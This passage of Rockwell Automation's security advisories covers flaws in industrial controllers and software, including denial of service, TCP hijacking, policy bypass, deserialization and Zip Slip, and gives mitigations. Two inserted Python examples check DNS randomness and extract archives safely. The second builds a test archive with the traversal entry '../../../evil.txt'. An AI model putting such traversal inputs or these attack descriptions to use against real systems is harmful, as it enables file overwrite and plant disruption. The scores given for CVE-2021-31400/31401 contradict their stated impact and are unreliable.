A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed ICMP packet, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H


CVE-2020-35685: TCP connections may be hijacked due to an insufficiently random source

A REMOTE, UNAUTHENTICATED attacker may be able to hijack a TCP connection and spoof the device’s network connections.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N


CVE-2021-31400: Malformed TCP segment could cause device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed TCP segment, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N


CVE-2021-31401: Malformed TCP header could cause device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed TCP header, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N


CVE-2021-31226: Malformed HTTP POST request could cause device to fault or bypass authentication

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed HTTP Post request, which would result in the device faulting and/or ceasing communications and requiring a power cycle, or possibly bypassing an authentication attempt.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 9.1/10 [CRITICAL]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H


CVE-2021-31227: Malformed HTTP POST request could cause device to fault by overwriting memory

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed HTTP Post request, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N


CVE-2021-31228: Non-random source port could lead to a spoofed DNS response

A REMOTE, UNAUTHENTICATED attacker may be able to spoof a DNS response, which would result in the device communicating with a potentially malicious server.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 4.0/10 [MEDIUM]
Researcher CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N
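The two randomness findings in this advisory (CVE-2020-25926, transaction IDs; CVE-2021-31228, source ports) can be checked on equipment you operate by sampling its outgoing DNS queries at a span port and looking at how the two 16-bit fields vary. The Python below is an added example, not Rockwell Automation's or the researchers' code: the query bytes and port numbers are constructed, and the 0.9 distinct-value threshold is an assumed tuning value.

```python
"""Check a device's DNS queries for predictable transaction IDs and source ports (added example)."""
import random
import struct


def build_query(txid: int, name: str = "example.com") -> bytes:
    """Construct a minimal DNS query (12-byte header + one A question) so the parser has real bytes."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # ID, flags (RD), QD, AN, NS, AR
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    return header + qname + struct.pack(">HH", 1, 1)  # QTYPE A, QCLASS IN


def transaction_id(query: bytes) -> int:
    """The transaction ID is the first 16-bit big-endian field of the DNS header."""
    if len(query) < 12:
        raise ValueError("truncated DNS header")
    return struct.unpack(">H", query[:2])[0]


def predictability(values, bits: int) -> dict:
    """Cheap indicators of weak randomisation over a sample of field values."""
    n = len(values)
    distinct = len(set(values))
    modulus = 1 << bits
    diffs = {(b - a) % modulus for a, b in zip(values, values[1:])}
    return {
        "fixed": distinct == 1,
        "arithmetic": n > 2 and len(diffs) == 1,   # constant step, e.g. +1 per query
        "distinct_ratio": distinct / n if n else 0.0,
    }


def assess(samples) -> list:
    """samples: list of (udp_source_port, raw_query_bytes) from one device. Returns findings."""
    ports = [p for p, _ in samples]
    txids = [transaction_id(q) for _, q in samples]
    findings = []
    for label, values in (("source port", ports), ("transaction ID", txids)):
        stats = predictability(values, 16)
        if stats["fixed"]:
            findings.append(f"{label} is constant ({values[0]})")
        elif stats["arithmetic"]:
            findings.append(f"{label} advances by a constant step (sequential)")
        elif stats["distinct_ratio"] < 0.9:   # assumed threshold
            findings.append(f"{label} repeats too often (distinct ratio {stats['distinct_ratio']:.2f})")
    return findings


# Constructed samples: a weak resolver (fixed port, counting txid) and a healthy one.
WEAK_DEVICE = [(1024, build_query(0x1000 + i)) for i in range(40)]
_rng = random.Random(1234)
HEALTHY_DEVICE = [(_rng.randrange(49152, 65536), build_query(_rng.randrange(65536))) for _ in range(40)]

if __name__ == "__main__":
    print("weak device:   ", assess(WEAK_DEVICE))
    print("healthy device:", assess(HEALTHY_DEVICE))
```

A few dozen queries are enough to catch a fixed port or a counter; a resolver that passes these checks can still be weak (a linear congruential generator, for instance), so treat a clean result as absence of the obvious defect rather than proof of good entropy.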


CVE-2021-36762: TFTP packet processing function does not ensure that the filename is null-terminated

Rockwell Automation is not impacted by this vulnerability.

Risk Mitigation & User Action

Customers using the affected firmware are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.
Product | Vulnerability | Mitigation
20-COMM-ER | CVE-2021-31226, CVE-2021-31227 | Disable the webserver. See the product’s user manual for the procedure to do this.

General Security Guidelines

  • Use proper network infrastructure controls, such as firewalls, to help confirm that DNS traffic from unauthorized sources is blocked.
  • Block traffic to port 80 (HTTP) and ICMP traffic using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • 20-COMM-ER user manual, publication 20COMM-UM015B-EN-P
  • ICSA-21-217-01
  • https://www.hcc-embedded.com/support/security-advisories
  • https://www.forescout.com/resources/infrahalt-discovering-mitigating-large-scale-ot-vulnerabilities
  • https://www.forescout.com/blog/new-critical-operational-technology-vulnerabilities-found-on-nichestack/
  • https://jfrog.com/blog/infrahalt-14-new-security-vulnerabilities-found-in-nichestack/
  • https://literature.rockwellautomation.com/idc/groups/literature/documents/um/20comm-um015_-en-p.pdf

High
PN1571 | PN1571 | MicroLogix 1100 Persistent CPU Fault Vulnerability
Published Date:
July 09, 2021
Last Updated:
July 09, 2021
CVE IDs:
CVE-2021-33012
Products:
1763 MicroLogix 1100
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number | Revision History
1.0 | Version 1.0 – July 9, 2021. Initial Release

Executive Summary

Rockwell Automation received a report from Beau Taub at Bayshore Networks regarding a vulnerability in the MicroLogix 1100. If successfully exploited, this vulnerability may limit the availability of the programmable logic controller. Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • MicroLogix 1100, all versions.

Vulnerability Details

CVE-2021-33012: Persistent fault may lead to denial of service conditions.

A vulnerability exists in the MicroLogix 1100 that may allow a remote, unauthenticated attacker to cause a persistent fault condition. This condition will prevent the PLC from entering a RUN state which cannot be fixed by resetting the device. If successfully exploited, this vulnerability will cause the controller to fault when the controller is switched to RUN mode.

CVSS v3.1 Base Score: 8.6/10 [High]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected firmware are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

Vulnerability | Suggested Actions
CVE-2021-33012 | Put the controller mode switch to “Run” mode. Customers should consider migrating to a more contemporary controller. Customers are encouraged to have a backup copy of the project in case it is necessary to recover from an event.


A controller in this state can be recovered by downloading a new project to the controller or an offline copy of the project.

Additionally, Customers can refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices for deploying network segmentation and broader defense in depth strategies. Customers can also refer to the Rockwell Automation System Security Design Guidelines on how to use Rockwell Automation products to improve the security of their industrial automation systems.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

  • Use proper network infrastructure controls, such as firewalls, to help confirm that EtherNet/IP™ network traffic from unauthorized sources is blocked.
  • Consult the product documentation for specific features, such as a hardware mode switch setting, which may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see BF7490 - TCP/UDP Ports Used by Rockwell Automation Products
General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-21-189-01

High
PN1569 | PN1569 | FactoryTalk Security Remote Desktop Connection ‘Computer Name’ Policy Bypass Vulnerability
Published Date:
June 10, 2021
Last Updated:
June 10, 2021
CVE IDs:
CVE-2021-32960
Products:
FactoryTalk Services Platform
CVSS Scores:
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number | Revision History
1.0 | Version 1.0 - June 10, 2021. Initial Release.

Executive Summary

Rockwell Automation discovered a vulnerability in FactoryTalk® Security, part of FactoryTalk Services Platform. This vulnerability, if successfully exploited, may allow remote, authenticated users to bypass FactoryTalk Security policies that are based on a computer name. These policies may be important to customers who are concerned about users at an engineering workstation having ‘line-of-sight’ visibility to the systems they are operating.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk Services Platform v6.11 and earlier, if FactoryTalk Security is enabled and deployed.

Vulnerability Details

CVE-2021-32960: FactoryTalk Security protection mechanism failure for remote desktop connections
FactoryTalk Services Platform contains a vulnerability that may allow a remote, authenticated attacker to bypass FactoryTalk Security policies based on the computer name. If successfully exploited, this may allow an attacker to have the same privileges as if they were logged on to the client machine.

CVSS v3.1 Base Score: 8.5/10 [HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these tactics with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability | Suggested Actions
CVE-2021-32960 | Apply FactoryTalk Services Platform v6.20 or later.

If upgrade is not possible, customers should consider the following guidance:
  • When possible, do not utilize remote desktop connections.
  • Use Microsoft® Event Logger or similar event logging application to monitor atypical remote desktop connections and disconnections. Information on Setting up Windows® Event Logs is available at Knowledgebase Article QA5965.

General Security Guidelines

  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

Medium
PN1566 | PN1566 | Micro800 and MicroLogix 1400 Vulnerable to Man-in-the-Middle Attack
Published Date:
May 25, 2021
Last Updated:
May 25, 2021
CVE IDs:
CVE-2021-32926
Products:
Micro800, 1766 MicroLogix 1400
CVSS Scores:
6.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number | Revision History
1.0 | Version 1.0 – May 25, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Adeen Ayub from Virginia Commonwealth University, Hyunguk Yoo from The University of New Orleans, and Irfan Ahmed from Virginia Commonwealth University regarding a man-in-the-middle vulnerability in the Micro800™ and MicroLogix™ 1400. If successfully exploited, this vulnerability may result in denial-of-service conditions. To recover from this condition, a firmware flash on the controller will need to be performed. Firmware flashing will put the controller into the default state and the user program and data will be lost.

Customers using affected products are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Micro800, all versions.
MicroLogix 1400, version 21 and later when Enhanced Password Security is enabled.

Vulnerability Details

CVE-2021-32926: Improper authentication may lead to denial of service conditions
A vulnerability exists in how the Micro800 and MicroLogix 1400 controllers authenticate password change requests. If successfully exploited, this vulnerability may allow a remote, unauthenticated attacker to perform a man-in-the-middle attack in which the attacker intercepts the message that includes the legitimate, new password hash and replaces the legitimate password hash with an illegitimate hash. The user would no longer be able to authenticate to the controller, causing a denial-of-service condition.


CVSS v3.1 Base Score: 6.1/10 [Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected controllers are directed towards risk mitigation, as Rockwell Automation has determined that this vulnerability cannot be remediated with a patch. Customers are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.
Vulnerability | Suggested Actions
CVE-2021-32926 | Confirm that setting and updating the password for the controller is done within a trusted network environment that is only accessible to authorized users.

If this vulnerability is successfully exploited, the password can be reset by performing a firmware flash on the controller. Firmware flashing will put the controller into the default state and the user program and data will be lost.

A comprehensive defense-in-depth strategy can reduce the risk of this vulnerability. To leverage the vulnerability, an unauthorized user would require access to the same network as the controller. Customers should confirm they are employing proper networking segmentation and security controls.

Customers can refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices for deploying network segmentation and broader defense in depth strategies. Customers can also refer to the Rockwell Automation System Security Design Guidelines on how to use Rockwell Automation products to improve the security of their industrial automation systems.

General Security Guidelines

  • Use proper network infrastructure controls, such as firewalls, to confirm that CIP™ traffic from unauthorized sources is blocked.
  • Block all traffic to EtherNet/IP™ or other CIP protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 44818 and Port# 2222 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

High
PN1565 | PN1565 | Connected Components Workbench Vulnerable to Multiple Phishing-Style Attacks
Published Date:
May 13, 2021
Last Updated:
May 13, 2021
CVE IDs:
CVE-2021-27473, CVE-2021-27471, CVE-2021-27475
Products:
Connected Components Workbench
CVSS Scores:
6.1, 7.7, 8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number | Revision History
1.0 | Version 1.0 - May 13, 2021. Initial Release.

Executive Summary

Rockwell Automation received a report from Mashav Sapir of Claroty regarding three vulnerabilities in Connected Components Workbench™. If successfully exploited, these vulnerabilities may result in directory traversal, privilege escalation, and arbitrary code execution. These vulnerabilities all require user interaction through a phishing attack, for example, to be successfully exploited.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Connected Components Workbench v12.00.00 and below.

Vulnerability Details

CVE-2021-27475: Deserialization of untrusted data may result in arbitrary code execution
Connected Components Workbench does not limit the object types that can be deserialized. This vulnerability allows attackers to craft a malicious serialized object that, if opened by a local user in Connected Components Workbench, may result in remote code execution. This vulnerability requires user interaction to be successfully exploited.

CVSS v3.1 Base Score: 8.6/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2021-27471: Directory traversal vulnerability may lead to privilege escalation
The parsing mechanism that processes certain file types does not sanitize file paths. This may allow an attacker to craft malicious files that, when opened by Connected Components Workbench, can traverse the file system. If successfully exploited, an attacker would be able to overwrite existing files and create additional files with the same permissions as the Connected Components Workbench software. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 7.7/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2021-27473: Improper input sanitization may lead to privilege escalation
Connected Components Workbench does not sanitize paths specified within the .ccwarc archive file during extraction. This type of vulnerability is also commonly referred to as a Zip Slip. A local, authenticated attacker can create a malicious .ccwarc archive file that, when opened by Connected Components Workbench, will allow the attacker to gain the privileges of the software. If the software is running at SYSTEM level, the attacker will gain admin-level privileges. User interaction is required for this exploit to be successful.

CVSS v3.1 Base Score: 6.1/10[MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
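The two path-handling flaws above (CVE-2021-27471 and the Zip Slip case, CVE-2021-27473) come down to one missing check: an archive entry name must never be allowed to resolve outside the extraction directory. The following is an added example, not Rockwell Automation code; because the .ccwarc layout is not described here, an ordinary zip archive built in memory stands in for it (assumption), and the entry names and contents are constructed.

```python
"""Archive extraction guarded against Zip Slip (path traversal through
archive entry names). Added example, not Rockwell Automation code; a plain
zip file built in memory stands in for the .ccwarc format (assumption)."""
import io
import os
import re
import tempfile
import zipfile


class UnsafeEntryError(ValueError):
    """An archive member would be written outside the destination."""


def safe_member_path(dest_dir: str, member_name: str) -> str:
    """Map an archive entry name to an absolute path inside dest_dir.

    Raises UnsafeEntryError when the name is empty, absolute or
    drive-qualified, or resolves (after '..' and symlink resolution)
    outside dest_dir. Backslashes count as separators so an entry written
    on Windows cannot slip past a '/'-only check on another host.
    """
    name = member_name.replace("\\", "/")
    if not name or name.startswith("/") or re.match(r"^[A-Za-z]:", name):
        raise UnsafeEntryError(f"absolute or drive-qualified entry: {member_name!r}")
    root = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(root, *name.split("/")))
    # commonpath() compares whole components, so '<root>2' is never
    # mistaken for a path under '<root>'.
    if os.path.commonpath([root, target]) != root:
        raise UnsafeEntryError(f"entry escapes destination: {member_name!r}")
    return target


def is_safe_member(dest_dir: str, member_name: str) -> bool:
    """Boolean form of safe_member_path()."""
    try:
        safe_member_path(dest_dir, member_name)
        return True
    except UnsafeEntryError:
        return False


def extract_checked(archive: bytes, dest_dir: str) -> list:
    """Extract a zip archive held in memory into dest_dir.

    Every member name is validated before anything is written, so a
    hostile entry late in the archive cannot land after benign ones have
    already been created. Returns the member names written.
    """
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        plan = [(info, safe_member_path(dest_dir, info.filename))
                for info in zf.infolist()]
        for info, target in plan:
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(info.filename)
    return written


def build_archive(entries: dict) -> bytes:
    """Build a zip archive from {entry_name: bytes}; names are stored
    verbatim, '..' included (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(zipfile.ZipInfo(name), content)
    return buf.getvalue()


def demo() -> dict:
    """Extract a benign project archive, then show a traversal entry being
    refused before any file of that archive is written."""
    benign = build_archive({
        "PumpStation/Solution.xml": b"<Solution/>",
        "PumpStation/Controller/Main.txt": b"constructed program text",
    })
    hostile = build_archive({
        "PumpStation/Solution.xml": b"<Solution/>",
        "../../../evil.txt": b"would land outside the destination",
    })
    with tempfile.TemporaryDirectory() as out:
        written = extract_checked(benign, out)
        try:
            extract_checked(hostile, out)
            blocked = None
        except UnsafeEntryError as exc:
            blocked = str(exc)
    return {"written": written, "blocked": blocked}
```

Python's own `ZipFile.extract()` strips such components, but custom extractors and other archive libraries often do not, which is why the check is done explicitly here.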

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability | Suggested Actions
CVE-2021-27475, CVE-2021-27471, CVE-2021-27473 | Upgrade to Connected Components Workbench v13.00.00 or later. (Link)

If upgrade is not possible, customers should consider deploying the following mitigations:
  • Run Connected Components Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Do not open untrusted .ccwarc files with Connected Components Workbench. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use Microsoft® AppLocker or another similar allow-list application to help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

Critical
PN1564 | PN1564 | DNS Name:Wreck Vulnerabilities Affect Multiple Rockwell Automation Products
Published Date:
April 28, 2021
Last Updated:
April 28, 2021
CVE IDs:
CVE-2016-20009
Products:
5069 CompactLogix, Communications Modules, 1769 CompactLogix Controllers, 1756 ControlLogix
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number | Revision History
1.0 | Version 1.0 - April 26, 2021. Initial release.
1.1 | Version 1.1 - April 28, 2021. Updated affected products and suggested user actions.

Executive Summary

On April 12, 2021, Forescout and JSOF released a report titled "NAME:WRECK" regarding nine DNS-related vulnerabilities in 4 TCP/IP stacks utilized by many different technology vendors, including Rockwell Automation™. Rockwell Automation is impacted by one of these nine reported vulnerabilities. This vulnerability, if successfully exploited, may result in remote code execution.

Rockwell Automation continues to investigate the impact of these vulnerabilities and will update this advisory if additional products are impacted. We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Customers using potentially affected products are encouraged to evaluate their own systems and apply the appropriate mitigations from those listed below. Additional details relating to the discovered vulnerability and recommended countermeasures are provided herein.

Affected Products

Product Family | Catalogs | Affected Versions
Compact 5000™ I/O EtherNet/IP Adapter | 5069-AEN2TR | All versions.
CompactLogix 5370 | 1769-L1y, 1769-L2y, 1769-L3y | All versions prior to v30.
CompactLogix 5370 | 1769-L3yS | All versions prior to v30, excluding v28.015.
ControlLogix® 5580 | 1756-L8 | All versions prior to v30.
CompactLogix 5380 | 5069-L3 | All versions prior to v30.
ControlLogix EtherNet/IP Module | 1756-EN2T/D, 1756-EN2TK/D, 1756-EN2TXT/D, 1756-EN2F/C, 1756-EN2FK/C, 1756-EN2TR/C, 1756-EN2TRK/C, 1756-EN2TRXT/C, 1756-EN3TR/B, 1756-EN3TRK/B, 1756-EN2TPK/A, 1756-EN2TPXT/A | All versions prior to v11.001.
ControlLogix EtherNet/IP Module | 1756-EN2TP/A | All versions prior to v10.020.

Note: GuardLogix® 5580 and Compact GuardLogix® 5380 are not affected by this vulnerability.

Vulnerability Details

CVE-2016-20009: Stack-based overflow in IPnet may lead to remote code execution
In Wind River VxWorks versions 6.5 through 7, the DNS client (IPnet) has a stack-based overflow in the message decompression function. This may allow a remote, unauthenticated attacker to perform remote code execution.

CVSS v3.1 Base Score: 9.8/10[CRITICAL]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
